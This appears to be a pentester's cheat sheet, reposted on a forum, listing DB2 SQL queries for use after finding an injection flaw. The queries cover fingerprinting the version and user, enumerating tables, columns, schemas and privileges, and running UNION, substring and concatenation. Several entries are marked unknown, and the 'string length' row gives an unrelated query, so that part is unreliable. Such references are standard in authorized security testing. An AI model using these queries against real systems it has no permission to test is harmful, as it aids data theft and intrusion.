DB2 SQL Injection Cheat Sheet
Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience.When you do find one, though it pays to be prepared...Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection.All tests were performed on DB2 8.2 under Windows.
DescriptionSQL / Comments Commentsselect blah from foo; -- comment like this
Batching Queries Allowed?
???
Database Version
select versionnumber, version_timestamp from sysibm.sysversions;
Current Database User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
System User for Current Connection
select system_user from sysibm.sysdummy1; Current Database
select current server from sysibm.sysdummy1;
Limiting Rows Returned SELECT foo FROM bar fetch first 1 rows only;
Returning N Rows starting at Offset Mselect name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
List Tables
select name from sysibm.systables;
List Columns
select name, tbname, coltype from sysibm.syscolumns;
List Databse Users and Passwords
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
FROM clause mandated in SELECTs?Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1; UNION supported
Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
Enumerate Tables Privs
select * from syscat.tabauth;
Enumerate Current Privs
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user; Length of a stringselect name, tbname, coltype from sysibm.syscolumns; -- returns 3
Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!
Substring SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;-- returns b
ASCII value of a character
select ascii('A') from sysibm.sysdummy1; -- returns 65Character from ASCII value
select chr(65) from sysibm.sysdummy1; -- returns 'A' Roles and passwords
N/A (I think DB2 uses OS-level user accounts for authentication.) List Database Procedures
???Create Users + Granting Privs ??? Time Delays
??? Execute OS Commands ??? Write to File System ??? ConcatenationSELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
CastingSELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemasSELECT schemaname FROM syscat.schemata;
This page will probably remain a work-in-progress for some time yet.I'll update it as I learn more.
页:
[1]